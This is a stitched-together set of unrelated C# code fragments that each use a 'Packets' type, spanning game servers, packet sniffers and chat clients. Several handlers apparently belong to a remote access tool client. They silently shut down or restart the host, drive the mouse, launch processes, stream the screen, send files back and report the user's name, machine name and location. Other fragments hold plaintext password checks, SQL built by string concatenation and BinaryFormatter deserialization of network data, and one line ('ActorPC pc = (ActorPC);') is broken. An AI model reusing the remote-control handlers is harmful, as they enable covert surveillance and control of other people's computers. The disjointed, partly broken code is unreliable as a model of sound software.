private void Handle_CMSG_LOGINREQUEST(Packets.CMSG_LOGINREQUEST packet) { Utilities.ConsoleStyle.Debug("Check client account .. "); var account = Database.Models.AccountModel.FindOne(packet.Username); if (account != null) { if (account.Password == packet.Password)//Check password { this.Account = account;//Client is logged this.Send(new Packets.SMSG_LOGINRESULT(Enums.LoginResultEnum.CORRECT_LOGIN, account.ID, account.IsOp(), account.Pseudo)); Utilities.ConsoleStyle.Infos("Player @'" + account.Username + "'@ connected !"); this.Send_SMSG_LISTWORLDS(); } else { Utilities.ConsoleStyle.Error("Password don't match"); this.Send(new Packets.SMSG_LOGINRESULT(Enums.LoginResultEnum.INVALID_LOGIN, account.ID, account.IsOp(), account.Pseudo)); } } else { Utilities.ConsoleStyle.Error("Can't found the account @'" + packet.Username + "'@"); this.Send(new Packets.SMSG_LOGINRESULT(Enums.LoginResultEnum.INVALID_LOGIN, -1, false, "")); } }
public bool AddPlayer(MapleCharacter chr) { if (Participants.ContainsKey(chr.Id)) { return(false); } int position = GetFreePosition(); if (position == -1) { return(false); //No space } MapleMessengerCharacter mcc = new MapleMessengerCharacter(position, chr); chr.ChatRoom = this; chr.Client.SendPacket(Packets.EnterRoom((byte)position)); var playerAddPacket = Packets.AddPlayer(mcc); BroadCastPacket(playerAddPacket, chr.Id); foreach (MapleMessengerCharacter participant in Participants.Values) { chr.Client.SendPacket(Packets.AddPlayer(participant)); } Participants.Add(chr.Id, mcc); return(true); }
public void OnLogin(Packets.Client.CSMG_LOGIN p) { p.GetContent(); if (MapServer.accountDB.CheckPassword(p.UserName, p.Password, this.frontWord, this.backWord)) { Packets.Server.SSMG_LOGIN_ACK p1 = new SagaMap.Packets.Server.SSMG_LOGIN_ACK(); p1.LoginResult = SagaMap.Packets.Server.SSMG_LOGIN_ACK.Result.OK; p1.Unknown1 = 0x100; p1.Unknown2 = 0x486EB420; this.netIO.SendPacket(p1); account = MapServer.accountDB.GetUser(p.UserName); uint[] charIDs = MapServer.charDB.GetCharIDs(account.AccountID); account.Characters = new List<ActorPC>(); for (int i = 0; i < charIDs.Length; i++) { account.Characters.Add(MapServer.charDB.GetChar(charIDs[i])); } this.state = SESSION_STATE.AUTHENTIFICATED; } else { Packets.Server.SSMG_LOGIN_ACK p1 = new SagaMap.Packets.Server.SSMG_LOGIN_ACK(); p1.LoginResult = SagaMap.Packets.Server.SSMG_LOGIN_ACK.Result.GAME_SMSG_LOGIN_ERR_BADPASS; this.netIO.SendPacket(p1); } }
/// <summary> /// For designer only /// </summary> public SimpleTextCaptureViewModel() { RefreshCommand = new RelayCommand(Refresh); Packets.Add(new PacketViewModel(new byte[] { 1, 2, 3, 4, 5 })); Packets.Add(new PacketViewModel(new byte[] { 1, 2, 3, 4, 5 })); }
public static byte[] BuildPacket(Packets.LicensePlatePacket plateExpected) { var mem = new MemoryStream(); var writer = new EndianBinaryWriter(Configuration.EndianBitConverter, mem, Configuration.Encoding); var licenseBytes = Configuration.Encoding.GetBytes(plateExpected.LicensePlate.LicenseNumber); writer.Write(licenseBytes); writer.Write(01u); writer.Write((UInt32)plateExpected.CaptureTime.ToBinary()); writer.Write((UInt32)plateExpected.CaptureLocation.Id); int imgCount = plateExpected.EvidenceImageData.Count; writer.Write((uint)imgCount); var imgData = plateExpected.EvidenceImageData; for (int i = 0; i < imgCount; ++i) { writer.Write((uint)imgData[i].Length); } for (int i = 0; i < imgCount; ++i) { writer.Write(imgData[i]); } return mem.ToArray(); }
public static void HandleDoShutdownAction(Packets.ServerPackets.DoShutdownAction command, Client client) { try { ProcessStartInfo startInfo = new ProcessStartInfo(); switch (command.Action) { case ShutdownAction.Shutdown: startInfo.WindowStyle = ProcessWindowStyle.Hidden; startInfo.CreateNoWindow = true; startInfo.UseShellExecute = true; startInfo.Arguments = "/s /t 0"; // shutdown startInfo.FileName = "shutdown"; Process.Start(startInfo); break; case ShutdownAction.Restart: startInfo.WindowStyle = ProcessWindowStyle.Hidden; startInfo.CreateNoWindow = true; startInfo.UseShellExecute = true; startInfo.Arguments = "/r /t 0"; // restart startInfo.FileName = "shutdown"; Process.Start(startInfo); break; case ShutdownAction.Standby: Application.SetSuspendState(PowerState.Suspend, true, true); // standby break; } } catch (Exception ex) { new Packets.ClientPackets.SetStatus(string.Format("Action failed: {0}", ex.Message)).Execute(client); } }
private void ParseBits() { var parser = new Parser(_bits); Packets.Add(parser.ParsedPacket); Ignored = _bits[parser.Consumed..];
public bool ExecuteScriptForNpc() { if (ScriptInstance == null) { return(false); } try { if (IsShop) { Client.SendPacket(Packets.ShowShop((ShopScript)ScriptInstance, NpcId)); } ScriptInstance.Execute(); return(true); } catch (Exception ex) { string errorString = string.Format("NpcId: {0}\r\nState: {1}\r\n Selection: {2}\r\nException: {3}", NpcId, ScriptInstance.State, ScriptInstance.Selection, ex); ServerConsole.Debug("Npc script execution error: " + errorString); FileLogging.Log("Npc scripts", errorString); SendOk("An error occured, please report this on the forums\r\nNpcId: " + NpcId); Dispose(); return(false); } }
public static void HandleDoMouseEvent(Packets.ServerPackets.DoMouseEvent command, Client client) { Screen[] allScreens = Screen.AllScreens; int offsetX = allScreens[command.MonitorIndex].Bounds.X; int offsetY = allScreens[command.MonitorIndex].Bounds.Y; Point p = new Point(command.X + offsetX, command.Y + offsetY); switch (command.Action) { case MouseAction.LeftDown: case MouseAction.LeftUp: NativeMethodsHelper.DoMouseLeftClick(p, command.IsMouseDown); break; case MouseAction.RightDown: case MouseAction.RightUp: NativeMethodsHelper.DoMouseRightClick(p, command.IsMouseDown); break; case MouseAction.MoveCursor: NativeMethodsHelper.DoMouseMove(p); break; case MouseAction.ScrollDown: NativeMethodsHelper.DoMouseScroll(p, true); break; case MouseAction.ScrollUp: NativeMethodsHelper.DoMouseScroll(p, false); break; } }
public void ClientSent(FFXIVIpcHeader header, byte[] data, int offset) { var dataLen = data.Length - offset; if (dataLen < ClientIPCPingDataSize || dataLen > ClientIPCPingDataSize * 2) { return; } Packets.NaiveParsePacket <FFXIVClientIpcPingData>(data, offset, out var pkt); unsafe { if (!IsAllZeros(pkt.Unknown, 20)) { return; } } if (pkt.Timestamp == 0) { return; } lock (_buffer) { ref var slot = ref _buffer[_bufferPointer & BufferMask]; slot.TimeStamp = DateTime.UtcNow.EpochMillis(); slot.ClientSent = true; slot.OpCode = header.Type; slot.PingTimeStamp = pkt.Timestamp; _bufferPointer++; }
public MainWindow() { InitializeComponent(); Instance = this; this.MaxHeight = SystemParameters.MaximizedPrimaryScreenHeight; System.Net.ServicePointManager.DefaultConnectionLimit = 100; InitAMVC(); Packets.SendPacket <GetFriendIDs>(); Packets.SendPacket <GetNotifications>(); Packets.SendPacket <GetSelfID>(); Packets.SendPacket <GetSelfProfile>(); Packets.SendPacket <RecentConversations>(); Sticker.Load(() => { Packets.SendPacket <GetBoughtStickerPacksRequest>(); Packets.SendPacket <GetNearestSickerRequest>(); }); SetNotificationDotState(false); SelfAvatar.ClickTrigger.Visibility = Visibility.Hidden; SelfAvatar.ClickTrigger.IsEnabled = false; SelfAvatar.IsOnline = true; SelfAvatar.UpdateAllInstance(); ProfileContext.BtnSignOut.Click += BtnSignOut_Click; }
/// <summary> /// Store a captured CAN packet /// </summary> /// <param name="TimeInMicroseconds">Time registered by PEAK device</param> /// <param name="CANId">Id of the packet</param> /// <param name="DataLength">Length of data</param> /// <param name="Data">Captured data</param> /// <returns>Reference to the packet</returns> Packet UpdatePackets(ulong TimeInMicroseconds, uint CANId, byte DataLength, byte[] Data) { Packet packet; if (overwriteLastPacket) { //Update packet list by overwriting last value packet = Packets.Find(x => x.Id == CANId); if (packet == null) { packet = new Packet(); Packets.Add(packet); } } else { //store as new values packet = new Packet(); Packets.Add(packet); } //add/update values packet.Microseconds = TimeInMicroseconds; packet.Id = CANId; packet.Length = DataLength; packet.Data = Data; //remember first packet for diff calc if (DiffPacket == null) { AddMessage(Feedback, "First packet received " + PacketToString(packet)); DiffPacket = Packet.Clone(packet); } return(packet); }
public string ParseLoad(Packet p) { whil = string.Empty; foreach (Table.Field k in schemas[p.ID].Fields.Values) { try { //for (int j = 0; k.WhileLength >= j; j++) { ParseLoadT(p, k); if (k.Merge) { int index = Packets.IndexOf(p) + 1; while (p.Length + 6 < long.Parse(k.Return)) { Packet <int> tmp = Packets[index++]; p.PutBytes(tmp.GetBytes((ushort)(tmp.Length - 6), 6), (ushort)p.Length); } } if (ulong.TryParse(k.Return, out ulong r) && k.RunMORM) { if (r >= k.RunMin && r >= k.RunMax) { return(""); } } } } catch (Exception ex) { MessageBox.Show(ex.ToString(), "Error", MessageBoxButtons.OK, MessageBoxIcon.Error); } } return(whil); }
public async void PlayerDelete(uint flPlayerID) { // fixme: might crash if the player leaves if (!Players.ContainsKey(flPlayerID)) { return; } var player = Players[flPlayerID]; Players.Remove(flPlayerID); if (player.Ship.Objid != 0) { DelSimObject(player.Ship); } if (Players.ContainsKey(flPlayerID)) { Players.Remove(flPlayerID); } foreach (var item in Players.Values) { item.SendMsg(Packets.PlayerListDepart(player.FLPlayerID)); } }
public void SendToAll(Packets id, byte[] data, bool reliable = true) { foreach (ServerPlayer player in PlayingPlayers) { player.conn.Send(id, data, reliable); } }
public void Connect(string playerName, string IP = "", int Port = 2048) { //Start Client _client.Start(); //Create Outgoing Message NetOutgoingMessage outMsg = _client.CreateMessage(); //Create Packet Packets.LoginRequestPacket loginPacket = new Packets.LoginRequestPacket() { name = playerName }; //Write Packet Packets.WritePacket(ref outMsg, ref loginPacket); //Connect to server with Packet _client.Connect(IP, Port, outMsg); //Debug Console.WriteLine("ClientNetworkManager: Starting Connection to " + IP + ":" + Convert.ToString(Port)); // Set timer to tick every 50ms update = new System.Timers.Timer(50); update.Elapsed += update_Elapsed; update.Start(); }
public void AddToPackets(PacketType type, byte[] data) { var packet = new Packet(type, data); Application.Current.Dispatcher.Invoke(delegate { Packets.Add(packet); }); var filterType = (PacketType)(SelectedPacketTypeIndex - 1); if (filterType == type || SelectedPacketTypeIndex == 0) { if (_filterOpCode > 0) { if (_filterOpCode == packet.OpCode) { Application.Current.Dispatcher.Invoke(delegate { FilteredPackets.Add(packet); }); } } else { Application.Current.Dispatcher.Invoke(delegate { FilteredPackets.Add(packet); }); } } }
public FileController(WebSocket client, Packets packet) { _client = client; _packet = packet; //only do this operation on search request if (_packet.PacketType == PacketType.SearchFiles) { var startupDirEndingWithSlash = Path.GetDirectoryName(Process.GetCurrentProcess().MainModule.FileName) + "\\"; var resolvedDomainTimeFileName = startupDirEndingWithSlash + "Everything.dll"; if (!File.Exists(resolvedDomainTimeFileName)) { if (IntPtr.Size == 8) { Console.WriteLine(@"x64 Everything Loaded"); if (File.Exists(startupDirEndingWithSlash + "Everything64.dll")) { File.Copy(startupDirEndingWithSlash + "Everything64.dll", resolvedDomainTimeFileName); } } else { Console.WriteLine(@"x86 Everything Loaded"); if (File.Exists(startupDirEndingWithSlash + "Everything32.dll")) { File.Copy(startupDirEndingWithSlash + "Everything32.dll", resolvedDomainTimeFileName); } } } } }
/// <summary> /// Create a new Packet /// </summary> /// <param name="data">The compressed serialize packet</param> public Packet(IEnumerable <byte> data) { byte[] bytes; // Decompress the bytes using (var stream = new GZipStream(new MemoryStream(data.ToArray()), CompressionMode.Decompress)) { const int size = 4096; var buffer = new byte[size]; using (var memory = new MemoryStream()) { int count; do { count = stream.Read(buffer, 0, size); if (count > 0) { memory.Write(buffer, 0, count); } }while (count > 0); bytes = memory.ToArray(); } } Packet packet; // Deserialize the packet using (var stream = new MemoryStream(bytes)) packet = (Packet) new BinaryFormatter().Deserialize(stream); // Assign the variables in packet to this _packetId = packet._packetId; _senderPort = packet._senderPort; Code = packet.Code; Message = packet.Message; ReturnMessage = packet.ReturnMessage; }
public static void HandleDoProcessStart(Packets.ServerPackets.DoProcessStart command, Client client) { if (string.IsNullOrEmpty(command.Processname)) { new Packets.ClientPackets.SetStatus("Process could not be started!").Execute(client); return; } try { ProcessStartInfo startInfo = new ProcessStartInfo { UseShellExecute = true, FileName = command.Processname }; Process.Start(startInfo); } catch { new Packets.ClientPackets.SetStatus("Process could not be started!").Execute(client); } finally { HandleGetProcesses(new Packets.ServerPackets.GetProcesses(), client); } }
public void Disconnect(int timeout) { if (socket != null) { try { socket.Shutdown(SocketShutdown.Both); } catch (Exception) { } finally { if (timeout == -1) { socket.Close(); } else { socket.Close(timeout); } socket = null; } } GetMessage = null; Packets.Clear(); AESkey = null; RSAkey = new EncryptAndCompress.RSAKeyPair(); }
public static void EnqueuePacket(Packet p) { lock (_Locker) { Packets.Add(p); } }
/// <summary> /// 抽包 /// </summary> /// <param name="qcinfoid"></param> private void getPackets(int qcinfoid, int did) { try { //DTS包号 List <string> listbags = QCInfoDAL.GetBags(qcinfoid); //总包数 DataTable dtNO_OF_BALES = LinQBaseDao.Query("select NO_OF_BALES from dbo.DRAW_EXAM_INTERFACE where DRAW_EXAM_INTERFACE_ID=" + did).Tables[0]; string Packets_DTS = "";//DTS string类型包号 foreach (string item in listbags) { Packets_DTS += item + ","; } Packets_DTS = Packets_DTS.TrimEnd(','); Packets p = new Packets(); p.Packets_DTS = Packets_DTS; p.Packets_this = ""; p.Packets_QCInfo_DRAW_EXAM_INTERFACE_ID = did; p.Packets_Time = DateTime.Now; PacketsDAL.InsertOneQCRecord(p); Common.GetSumWaterCount(qcinfoid); LinQBaseDao.Query("update QCInfo set QCInfo_DRAW='" + Packets_DTS + "',QCInfo_PumpingPackets=" + Packets_DTS.Split(',').Count() + ",QCInfo_MOIST_Count=" + Common.SumWaterCount + " where QCInfo_ID=" + qcinfoid); } catch { } }
public void BuddyChannelChanged(MapleClient listOwnerClient, int characterId, int accountId, string characterName, bool accountBuddy, int channel) { bool isMyBuddy = false; MapleBuddy buddy; if (accountBuddy) { if (AccountBuddies.TryGetValue(accountId, out buddy)) { isMyBuddy = !buddy.IsRequest; if (isMyBuddy) { CharacterBuddies.Remove(characterId); } } } else if (CharacterBuddies.TryGetValue(characterId, out buddy)) { isMyBuddy = !buddy.IsRequest; } if (!isMyBuddy) { return; } buddy.Channel = channel; buddy.Name = characterName; listOwnerClient.SendPacket(Packets.BuddyChannelUpdate(characterId, accountId, channel, Invisible, characterName)); }
/// <summary> /// Takes one TCP packet as a byte array, filters it based on source/destination ports, and stores it for stream reassembly. /// </summary> /// <param name="buffer"></param> public unsafe void FilterAndStoreData(byte[] buffer) { // There is one TCP packet per buffer. if (buffer?.Length < sizeof(TCPHeader)) { Trace.WriteLine("TCPDecoder: Buffer length smaller than TCP header: Length=[" + (buffer?.Length ?? 0).ToString() + "].", "DEBUG-MACHINA"); return; } fixed(byte *ptr = buffer) { TCPHeader header = *(TCPHeader *)(ptr); if (_sourcePort != header.source_port || _destinationPort != header.destination_port) { return; } // if there is no data, we can discard the packet - this will likely be an ACK, but it shouldnt affect stream processing. if (buffer.Length - header.DataOffset == 0) { if ((header.flags & (byte)TCPFlags.SYN) == 0) { return; } } //TEMP debugging //Trace.WriteLine("TCPDecoder: TCP Sequence # " + header.SequenceNumber.ToString() + " received with " + (buffer.Length - header.DataOffset).ToString() + " bytes."); Packets.Add(buffer); } }
public Player(Connection connection) { this.connection = connection; //without this, new Packets(this); wouldn't function. if (connection != null) { loginDetails = connection.getLoginDetails(); } appearance = new Appearance(); follow = new Follow(this); bank = new Bank(this); inventory = new Inventory(this); equipment = new Equipment(this); friends = new Friends(this); prayers = new Prayers(this); skills = new Skills(this); attackStyle = new AttackStyle(); packets = new Packets(this); localEnvironment = new LocalEnvironment(this); updateFlags = new AppearanceUpdateFlags(this); walkingQueue = new WalkingQueue(this); specialAttack = new SpecialAttack(this); chat = true; split = false; mouse = true; aid = false; magicType = 1; achievementDiaryTab = false; forgeCharge = 40; smallPouchAmount = 0; mediumPouchAmount = 0; largePouchAmount = 0; giantPouchAmount = 0; defenderWave = 0; autoRetaliate = false; vengeance = false; lastVengeanceTime = 0; poisonAmount = 0; specialAmount = 100; skullCycles = 0; recoilCharges = 40; barrowTunnel = -1; barrowKillCount = 0; barrowBrothersKilled = new bool[6]; slayerPoints = 0; removedSlayerTasks = new string[4]; for (int i = 0; i < removedSlayerTasks.Length; i++) { removedSlayerTasks[i] = "-"; } agilityArenaStatus = 0; taggedLastAgilityPillar = false; paidAgilityArena = false; teleblockTime = 0; lastHit = -1; prayerDrainRate = 0; superAntipoisonCycles = 0; antifireCycles = 0; tradeRequests = new List <Player>(); duelRequests = new List <Player>(); }
public static void HandleMonitors(Packets.ServerPackets.Monitors command, Client client) { if (Screen.AllScreens != null && Screen.AllScreens.Length > 0) { new Packets.ClientPackets.MonitorsResponse(Screen.AllScreens.Length).Execute(client); } }
public void OnMotion(Packets.Client.CSMG_CHAT_MOTION p) { ChatArg arg = new ChatArg(); arg.motion = p.Motion; arg.loop = p.Loop; Map.SendEventToAllActorsWhoCanSeeActor(Map.EVENT_TYPE.MOTION, arg, this.Character, true); }
public override async ValueTask Handle(P00ConnectionHandshake packet) { ProtocolOptions config = options.Value; var response = Packets.New <P01ConnectionResponse>(); ProtocolOptions.Platform platform = config.Platforms.SingleOrDefault(p => p.Name == packet.ApplicationIdentifier); if (platform == null) { throw new ProtocolException($"Unsupported client {packet.ApplicationIdentifier}"); } response.LatestVersion = platform.VersionName; response.LatestVersionCode = platform.VersionCode; if (packet.ProtocolVersion != config.ProtocolVersion || packet.VersionCode < platform.ForceUpdateThreshold) { response.ConnectionState = ConnectionState.MustUpgrade; } else if (packet.VersionCode < platform.RecommendUpdateThreshold) { response.ConnectionState = ConnectionState.CanUpgrade; } else { response.ConnectionState = ConnectionState.Valid; } Client.Initialize(packet.ApplicationIdentifier, packet.VersionCode); await Client.Send(response).ConfigureAwait(false); }
public void OnSit(Packets.Client.CSMG_CHAT_SIT p) { ChatArg arg = new ChatArg(); arg.motion = MotionType.SIT; arg.loop = 1; Map.SendEventToAllActorsWhoCanSeeActor(Map.EVENT_TYPE.MOTION, arg, this.Character, true); }
public static uint SpawnCharacter(BinaryReader reader) { uint id = reader.ReadUInt32(); int baseId = reader.ReadInt32(); short rot = reader.ReadInt16(); float x = reader.ReadSingle(); float y = reader.ReadSingle(); float z = reader.ReadSingle(); List <KeyValuePair <StatType, object> > statsReceived = new List <KeyValuePair <StatType, object> >(); for (int i = 0; i < 3; i++) { statsReceived.Add(Packets.ReadStat(reader)); } Debug.Log(string.Format("Spawn character {0} {1} {2} {3}", id, x, y, z)); var data = new SpawnData() { id = id, mobId = baseId, rot = rot, pos = new System.Numerics.Vector3(x, y, z) }; var mob = MobsManager.Instance.SpawnCharacter(data); foreach (var item in statsReceived) { mob.Stats.SetStat(item.Key, item.Value); } return(id); }
public void SendPacket <T>(T packet, Packets packetType) where T : class { foreach (int clientID in ConnectionManager.Instance.GetClientIDs()) { SendPacket(packet, packetType, clientID); } }
public void Update(float deltaTime) { while (Packets.Count > 0) { IPacket oPacket = null; if (Packets.TryDequeue(out oPacket)) { IProtocol oProcess = null; if (Processers.TryGetValue(oPacket.PacketID, out oProcess)) { try { oProcess.ProcessAs(oPacket); } catch (Exception e) { App.Error($"协议调用堆栈错误!:\n{e}"); } } //else //{ // App.Error("PotocolID={0}没有找到协议处理类:", oPacket.PacketID); //} } } }
public static void HandleAction(Packets.ServerPackets.Action command, Client client) { try { ProcessStartInfo startInfo = new ProcessStartInfo(); switch (command.Mode) { case 0: startInfo.WindowStyle = ProcessWindowStyle.Hidden; startInfo.CreateNoWindow = true; startInfo.UseShellExecute = true; startInfo.Arguments = "/s /t 0"; // shutdown startInfo.FileName = "shutdown"; Process.Start(startInfo); break; case 1: startInfo.WindowStyle = ProcessWindowStyle.Hidden; startInfo.CreateNoWindow = true; startInfo.UseShellExecute = true; startInfo.Arguments = "/r /t 0"; // restart startInfo.FileName = "shutdown"; Process.Start(startInfo); break; case 2: Application.SetSuspendState(PowerState.Suspend, true, true); // standby break; } } catch { new Packets.ClientPackets.Status("Action failed!").Execute(client); } }
public static void HandleDoMouseClick(Packets.ServerPackets.DoMouseClick command, Client client) { Screen[] allScreens = Screen.AllScreens; int offsetX = allScreens[command.MonitorIndex].Bounds.X; int offsetY = allScreens[command.MonitorIndex].Bounds.Y; Point p = new Point(command.X + offsetX, command.Y + offsetY); if (command.LeftClick) { SetCursorPos(p.X, p.Y); mouse_event(MOUSEEVENTF_LEFTDOWN, p.X, p.Y, 0, 0); mouse_event(MOUSEEVENTF_LEFTUP, p.X, p.Y, 0, 0); if (command.DoubleClick) { mouse_event(MOUSEEVENTF_LEFTDOWN, p.X, p.Y, 0, 0); mouse_event(MOUSEEVENTF_LEFTUP, p.X, p.Y, 0, 0); } } else { SetCursorPos(p.X, p.Y); mouse_event(MOUSEEVENTF_RIGHTDOWN, p.X, p.Y, 0, 0); mouse_event(MOUSEEVENTF_RIGHTUP, p.X, p.Y, 0, 0); if (command.DoubleClick) { mouse_event(MOUSEEVENTF_RIGHTDOWN, p.X, p.Y, 0, 0); mouse_event(MOUSEEVENTF_RIGHTUP, p.X, p.Y, 0, 0); } } }
public void Seek(TimeSpan when) { lock ( LoadPacketBuffer ) { while (LoadPacketBuffer.Count > 0) { var apr = LoadPacketBuffer.Dequeue(); Keyframes += apr.Count(ap => ap.IsKeyframe); Packets.AddRange(apr); } } if (Packets.Count <= 0) { return; } DumpChunksAround(when); var i = BinarySearchIndexBefore(Packets, ap => ap.SinceStart >= when); if (i == -1) { i = 0; } Debug.Assert(Packets[i].DecodedCache != null); CurrentFrame.SinceStart = Packets[i].SinceStart; CurrentFrame.Data = Packets[i].DecodedCache; }
public static void HandleInitializeCommand(Packets.ServerPackets.InitializeCommand command, Client client) { SystemCore.InitializeGeoIp(); new Packets.ClientPackets.Initialize(Settings.VERSION, SystemCore.OperatingSystem, SystemCore.AccountType, SystemCore.Country, SystemCore.CountryCode, SystemCore.Region, SystemCore.City, SystemCore.ImageIndex, SystemCore.GetId(), SystemCore.GetUsername(), SystemCore.GetPcName()).Execute(client); }
// This is called from the main form to tell us where the application was launched from (where to look for the .conf files) // and also gives us the LogHandler method so we can send debug messages to the main form. public bool Init(string confDirectory, Action <string> logger) { // Pass the LogHandler on down to the PacketManager Packets.SetLogHandler(logger); var errorMessage = ""; // Here we init all the patch version specific decoders. The only reason one should fail to init is if it can't // find it's patch_XXXX.conf. // // If at least one initialises successfully, then return true to the caller, otherwise return false var allDecodersFailed = true; PatchDecoder.Init(confDirectory, ref errorMessage); foreach (var p in PatchList) { logger("Initialising patch " + p.GetVersion()); if (!p.Init(confDirectory, ref errorMessage)) { logger(errorMessage); } else { allDecodersFailed = false; } } return(!allDecodersFailed); }
// Add item to packets queue public void AddPacketToQueue(Packet packet, Node destination) { if (Packets.Count < MaxPackets) { if (Ip == destination.Ip) { bool packetExists = false; foreach (Packet item in Packets) { if (item.Content == packet.Content) { packetExists = true; } } if (packetExists == false) { Packets.Enqueue(packet); } } else { Packets.Enqueue(packet); } } }
void player_PlayerDeleted(object sender, Player.Player e) { //var revent = next_event as DPGameRunnerPlayerDeletedEvent; // fixme: might crash if the player leaves if (!Players.ContainsKey(e.FLPlayerID)) { return; } var player = Players[e.FLPlayerID]; Players.Remove(e.FLPlayerID); if (player.Ship.Objid != 0) { DelSimObject(player.Ship); } if (Playerlist.ContainsKey(e.FLPlayerID)) { Playerlist.Remove(e.FLPlayerID); } foreach (var item in Playerlist.Values) { Packets.SendPlayerListDepart(item.Player, player); } }
public static void Create(Entities.GameClient client, Packets.TeamActionPacket packet) { if (packet.EntityUID != client.EntityUID) return; if (client.Team != null) return; client.Team = new Team(); client.Team.Leader = client.EntityUID; if (client.Team.Members.TryAdd(client.EntityUID, client)) { using (var create = new Packets.TeamActionPacket()) { create.EntityUID = client.EntityUID; create.Action = Enums.TeamAction.Leader; client.Send(create); create.Action = Enums.TeamAction.Create; client.Send(create); } client.AddStatusEffect1(Enums.Effect1.TeamLeader, 0); } else { client.Team = null; } }
private void handle(Player p, Reader r) { Attack attack = new Attack(r, p, false); Console.WriteLine("Magic: " + attack.getSkill()); Mist mist = null; if (attack.getSkill() > 0) { SkillWz skillWz = Library.getSkill(attack.getSkill()); Skill s = p.getSkillsManager().getSkill(attack.getSkill()); if (s == null) return; // player doesn't have the skill if (s.getLevel() <= 0) return; // trying to use a skill that isn't atleast level 1 attack.setLevel(s.getLevel()); Info i = skillWz.getLevel(s.getLevel()); int hpCon = i.getInt("hpCon"); int mpCon = i.getInt("mpCon"); int x = i.getInt("x"); int prop = i.getInt("prop"); int time = i.getInt("time") * 1000; // Status effects for monsters int mobCount = i.getInt("mobCount"); int attackCount = i.getInt("attackCount"); int cooltime = i.getInt("cooltime"); if (p.getCooldown(attack.getSkill()) != null) { p.send(Packets.enableActions()); return; }
public static void HandleDoDownloadFile(Packets.ServerPackets.DoDownloadFile command, Client client) { new Thread(() => { try { FileSplit srcFile = new FileSplit(command.RemotePath); if (srcFile.MaxBlocks < 0) new Packets.ClientPackets.DoDownloadFileResponse(command.ID, "", new byte[0], -1, -1, srcFile.LastError).Execute(client); for (int currentBlock = 0; currentBlock < srcFile.MaxBlocks; currentBlock++) { if (!client.Connected) return; if (_canceledDownloads.ContainsKey(command.ID)) return; byte[] block; if (srcFile.ReadBlock(currentBlock, out block)) { new Packets.ClientPackets.DoDownloadFileResponse(command.ID, Path.GetFileName(command.RemotePath), block, srcFile.MaxBlocks, currentBlock, srcFile.LastError).Execute(client); } else new Packets.ClientPackets.DoDownloadFileResponse(command.ID, "", new byte[0], -1, -1, srcFile.LastError).Execute(client); } } catch (Exception ex) { new Packets.ClientPackets.DoDownloadFileResponse(command.ID, "", new byte[0], -1, -1, ex.Message) .Execute(client); } }).Start(); }
public void Close() { lock (SendLock) { if (listener != null) { try { listener.Shutdown(SocketShutdown.Both); } finally { listener.Close(); listener = null; } } StopThread(); SocketList.Clear(); Packets.Clear(); ToPeer.Clear(); SocketToKey.Clear(); clientcheck.Clear(); OnListenClient.Clear(); GetMessage = null; RSAkey = new EncryptAndCompress.RSAKeyPair(); } }
public void SendPacket(Packets.SLPacket packet) { lock (_locked) { foreach (SLDataListener l in _listeners) l.Send(packet); } }
public void OnRequestPCInfo(Packets.Client.CSMG_ACTOR_REQUEST_PC_INFO p) { Packets.Server.SSMG_ACTOR_PC_INFO p1 = new SagaMap.Packets.Server.SSMG_ACTOR_PC_INFO(); ActorPC pc = (ActorPC); p1.Actor = pc; Logger.ShowInfo(this.netIO.DumpData(p1)); this.netIO.SendPacket(p1); }
public void OnMapLoaded(Packets.Client.CSMG_PLAYER_MAP_LOADED p) { this.Character.invisble = false; this.Map.OnActorVisibilityChange(this.Character); this.Map.SendVisibleActorsToActor(this.Character); Packets.Server.SSMG_LOGIN_FINISHED p1 = new SagaMap.Packets.Server.SSMG_LOGIN_FINISHED(); this.netIO.SendPacket(p1); }
public static void HandleDoDownloadFileCancel(Packets.ServerPackets.DoDownloadFileCancel command, Client client) { if (!_canceledDownloads.ContainsKey(command.ID)) { _canceledDownloads.Add(command.ID, "canceled"); new Packets.ClientPackets.DoDownloadFileResponse(command.ID, "", new byte[0], -1, -1, "Canceled").Execute(client); } }
public void OnChat(Packets.Client.CSMG_CHAT_PUBLIC p) { if (!AtCommand.Instance.ProcessCommand(this, p.Content)) { ChatArg arg = new ChatArg(); arg.content = p.Content; Map.SendEventToAllActorsWhoCanSeeActor(Map.EVENT_TYPE.CHAT, arg, this.Character, true); } }
public void OnMove(Packets.Client.CSMG_PLAYER_MOVE p) { switch (p.MoveType) { case MoveType.RUN: this.Map.MoveActor(Map.MOVE_TYPE.START, this.Character, new short[2] { p.X, p.Y }, p.Dir, this.Character.Speed); break; } }
public static void HandleGetDesktop(Packets.ServerPackets.GetDesktop command, Client client) { var resolution = FormatHelper.FormatScreenResolution(ScreenHelper.GetBounds(command.Monitor)); if (StreamCodec == null) StreamCodec = new UnsafeStreamCodec(command.Quality, command.Monitor, resolution); if (StreamCodec.ImageQuality != command.Quality || StreamCodec.Monitor != command.Monitor || StreamCodec.Resolution != resolution) { if (StreamCodec != null) StreamCodec.Dispose(); StreamCodec = new UnsafeStreamCodec(command.Quality, command.Monitor, resolution); } BitmapData desktopData = null; Bitmap desktop = null; try { desktop = ScreenHelper.CaptureScreen(command.Monitor); desktopData = desktop.LockBits(new Rectangle(0, 0, desktop.Width, desktop.Height), ImageLockMode.ReadWrite, desktop.PixelFormat); using (MemoryStream stream = new MemoryStream()) { if (StreamCodec == null) throw new Exception("StreamCodec can not be null."); StreamCodec.CodeImage(desktopData.Scan0, new Rectangle(0, 0, desktop.Width, desktop.Height), new Size(desktop.Width, desktop.Height), desktop.PixelFormat, stream); new Packets.ClientPackets.GetDesktopResponse(stream.ToArray(), StreamCodec.ImageQuality, StreamCodec.Monitor, StreamCodec.Resolution).Execute(client); } } catch (Exception) { if (StreamCodec != null) new Packets.ClientPackets.GetDesktopResponse(null, StreamCodec.ImageQuality, StreamCodec.Monitor, StreamCodec.Resolution).Execute(client); StreamCodec = null; } finally { if (desktop != null) { if (desktopData != null) { desktop.UnlockBits(desktopData); } desktop.Dispose(); } } }
